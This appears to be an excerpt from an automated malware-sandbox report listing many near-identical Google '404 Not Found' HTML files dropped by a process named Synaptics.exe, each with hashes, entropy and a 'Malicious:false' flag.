                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MDgnSEoN6nePhRNh9JPsZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256977617391253
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+05bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+eb+pAZewRDK4mW
                                                                                                              MD5:A3367ADC6A61FEFD43CAD3D76A3346CC
                                                                                                              SHA1:A0FE6B668265CF08A1018565F00D6E4DE30D2CF3
                                                                                                              SHA-256:E062F536DA5DF82BEBAA6AE40FA1B47576258A206588AE7E2E317FD86ABB70E3
                                                                                                              SHA-512:CFFDD0F024AC78EB175BAEFFF730F66A811007FE8CC6151753B51474F647AD0B9634ECB9FC412F349332B700ED3C38C44DE90832DE5FBB89A417C21BA6E4AE76
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qlOg9wxMyA5-v606dP89tg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261364437551302
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                              MD5:C37305F0419D7A0A38B98FF3EFD19766
                                                                                                              SHA1:2FF0BC177A6213691C378D323196B59182B40C70
                                                                                                              SHA-256:4C22A982A6EB2DF3C8CAA742F512A55D722E6AC38604915C1320A31E6065716E
                                                                                                              SHA-512:07312C5B89D0E1C4A253750E93E26BEBC66EF974212BC397D9E038804A44EE0D8B1EE77652BD9FEA6E7E943C2106B7E84E09A80A150D12E78FF21E7AFA4DCFA8
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4YhFfdtD8M6hoHgyhTHt3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261202334945734
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sQ+pAZewRDK4mW
                                                                                                              MD5:740259B5B1AFD10BD41157A3BDEA77E0
                                                                                                              SHA1:2DA788504A26A73B96F8B8120BFB81C80516C56B
                                                                                                              SHA-256:B96709B65B54F1240B19A440A90BB57192B7D86D6B6DED7F88F3EDB14A4CBF7C
                                                                                                              SHA-512:433390596369499C13A3BBC61A4A5DEF0D806CA941EEB7F9982784B6C4561FAE22A2C7CC0B25C1D6F8938E830AC1FFE17A1010A9200DB44F9AD060743526086D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x8_Lnd10DjDai68N9Gd2BA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.273597865714932
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0aaYDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+wY+pAZewRDK4mW
                                                                                                              MD5:3DB774313E0B94B563652F4521D21B9D
                                                                                                              SHA1:6CEDF48B00F9E0671716B63704FF46DB91BE17F9
                                                                                                              SHA-256:BCD2C0E13913BCF6F8CB681DE9F1C45C1D4E08B9D91297629E4357673AA2D280
                                                                                                              SHA-512:3F0580A3B0253D4A75DF35E1C42D8767E2A9E2B4EB5EB09FD141F5274B764671636604E0D6BFAE48A38EA0D3FD8C0B1F7A7368A7003C24024526075BB2E28D9A
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3-COW6AbGQCgVhZwzWUTsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258369209954295
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0f9ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W9Z+pAZewRDK4mW
                                                                                                              MD5:89E08070BDF1B46451446C123A3AF69F
                                                                                                              SHA1:1FD203E58D4EDBDAD35C5EEBD363BD921B2C99EC
                                                                                                              SHA-256:00C82D342A6E5C285FAC45195BF15F0F09EB31EAE84D20B87B719F3881E88C96
                                                                                                              SHA-512:89F2DE4A250AE311AA82D9BA072988C240421134238A4EC809005F7B4BECC78F3AB06447669FD4E69220B5960EC2962051C4CFC92D01618259114BACA9A26C46
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MthMFODo-tBM9A2M_2mtLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.262514519150054
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0KrBzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                              MD5:3C20B0284AEF0DACDE2AFA6C2B40F6F8
                                                                                                              SHA1:2FCD4F5DD33E025374BD6A30DBEAA60FBE3FAF96
                                                                                                              SHA-256:6A7603806A4B0BBD13131ED994731EF6FC8FFDAC601CCB1D502ACD4209D5F882
                                                                                                              SHA-512:0B9C7ADB214B1C88A5A860E87620FD6337342B9D20431E21CC79B57D44F21E3F901D62FC7DFE13DE6491E2F59403517F56727550E6A22A3BD00D8E8F15B4A3AF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9QQ7boCeFJlTMaTcvazNWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260257331787912
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+08tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                              MD5:5ED167BFA316604F2A7A093A411CF5ED
                                                                                                              SHA1:CAC5AC03D72F8F5627FF9BCDE077E1360AD1F81E
                                                                                                              SHA-256:9BA192F0CBB9A2690BEE185201C0D5E0F8B7A7FD105F6D4FE274954AA7A5F5BC
                                                                                                              SHA-512:4C1527C41AEAA7BAD276AAA123C1778C81AC54FC3C0BF84B38C1A83A3BFC60205E35F9F3414A778C303CBA36EF786E5F97BB3826390D924ED23F6E6308543F10
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0y9GeYkuThTD6dX9yRIayg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260576408769174
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+09V+7E3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/Q3+pAZewRDK4mW
                                                                                                              MD5:872103ABD2F40D62251AD7ACF399481E
                                                                                                              SHA1:541C871DFE0CE6A53BEBF237D67821B4F3450D04
                                                                                                              SHA-256:2FD8BE73C28D738FBBD30B17F129C901400060D179F5926E19004901B1536745
                                                                                                              SHA-512:DDBD369B2DBC210903BDB4848AD4951F6BA3037FF534626E882D7C71994CEB262EBF8DB95AADB004EC3CE558A8C695002055A1E983EEB326EC27AB7485E7A749
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u6NcuK5oSCFcx-VSy_WaRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266137592457466
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0kbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+jb+pAZewRDK4mW
                                                                                                              MD5:3055A6E971C693209A42749AC5532477
                                                                                                              SHA1:A2E40969DF447723082D0A85C90ED0CE1AB8718E
                                                                                                              SHA-256:75CCDAE1664E6F19D2A823535247B8D799D9CB1CB64F7C16D5D237FF769DFD1D
                                                                                                              SHA-512:B1C8A19ABC8922DE2F9D7040C30B88299B1114ACC8F3CDDB01FC71DBE1064A07CA4868486849318C0F298EE434FF427BAF9A6CD8D4CB028BDBBB0B9E00D8F5D7
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CxNnYnCn7zXzIybpm4MXDA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260398765058078
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sX+pAZewRDK4mW
                                                                                                              MD5:9F71253BF4D613195A22402484D39875
                                                                                                              SHA1:29132646A82185D2D3ACA09524577562DF1DA31C
                                                                                                              SHA-256:3B568A2CD878D61200A813C4217D64D5B13397633B87526ECDFF436BD297828F
                                                                                                              SHA-512:FAA80985DB780219C6D28EE41273DE5C65CC8C2404E2A7650D961D6D7031C5F2FD1AC1F79B6E1399B16CDCDEC05C3CEA111AA8D0F124C7CF69E4E8FBCB569221
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nvKhmxFrmz9eO5KWzKkWKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.242126020951368
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jybSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fb+pAZewRDK4mW
                                                                                                              MD5:15453E59DC184C89176B7B9720CEE655
                                                                                                              SHA1:5CC7B9A5AB00C05407D2AB33439AC978625BFDD1
                                                                                                              SHA-256:A447B4EE1A6E2F5E09F707DD6B91353FC077F8F10331AD0FAABE682A3EE79562
                                                                                                              SHA-512:180012B0F9FF00A82241DB88142B6FF0A5752F4D361519BFE51025C0EDD104B00CE593EB44BD59876BA372F7DF9468B98FB4FD03555DDF78B0251745B772903E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aZme4ad_tKH4ueDqnFoppg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265271770249666
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0mESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hE+pAZewRDK4mW
                                                                                                              MD5:449B7C4037A047AB3BE43309B7D6008B
                                                                                                              SHA1:E6EE68AD944939CA2448A239EF24DB7DF5F600E4
                                                                                                              SHA-256:B506FB805860833BC2BFBFCB369C5BAB155C493F3128C03F74C3505CF39C45D9
                                                                                                              SHA-512:8AAB705627C9928FDA689B9D372DA708ED40EBB8BE35C5C65417F115E8D476495196EDDA6F35301C9794B3C8231BB81CE0DC5FF441B6CED7FC0D4B0AD095AFE5
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bWRQEHoIhJXSajr4x0lHXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.281273874880149
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+09MTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ua+pAZewRDK4mW
                                                                                                              MD5:25E9397EDCAF6F086181CB771431094C
                                                                                                              SHA1:CA09BF57F01DB679D8AC64075B736108C010B5AC
                                                                                                              SHA-256:074378C5B224572ED9A85F8CF874050B990B271156F41B5831F5DCD2179FB602
                                                                                                              SHA-512:E0D3FD5CBA6E4E6352C2934079546224A36C70EC7F7FA4C30C48CACB61137D320045E3B4CF07C34AAE30613876A28934B511D547365BCBCDD36A7D4456D955E6
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sRFILnIz6vCxPOIZJEXEdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266817555249458
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0+Ml3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Rq+pAZewRDK4mW
                                                                                                              MD5:28DFF2809AF2A0B8E14C0220A6393319
                                                                                                              SHA1:74C8DE3029D1E0B3475986095A92003E37B315FD
                                                                                                              SHA-256:DC3B6E4C92B26B6C1FF01AB0973AA6F8BD5768EB5091D54CB372E5F3ACC021DB
                                                                                                              SHA-512:91F13DF26FC1D945C696DA100F045505A3BAC906AD4E61A461A52572409707DC1EC124440054892FCFE9D105D252B2734393AD37BF3D3D04E1DB42A0307DB689
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="58IPeHT1SK5EqglgXt-DGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.272512600384138
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                              MD5:7017A560F3FA5CF9BE77AA1A05385060
                                                                                                              SHA1:AFF0021C0252E51520D95F1B3376190498941603
                                                                                                              SHA-256:40ECF662B6A3E6276D3F6BDB8C368AD35F4C56CE848F710B136B37859854BB89
                                                                                                              SHA-512:7BB9C4D090BDC1340C894050829809A417469A8DA671FB382D52AF3443C600EB6AEA9BE5909230B80664852F3D230E36F1D16B39CE8275A2AD099424F8F30A1C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VyV_NZ9qMaZ7IhfJN4AshA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
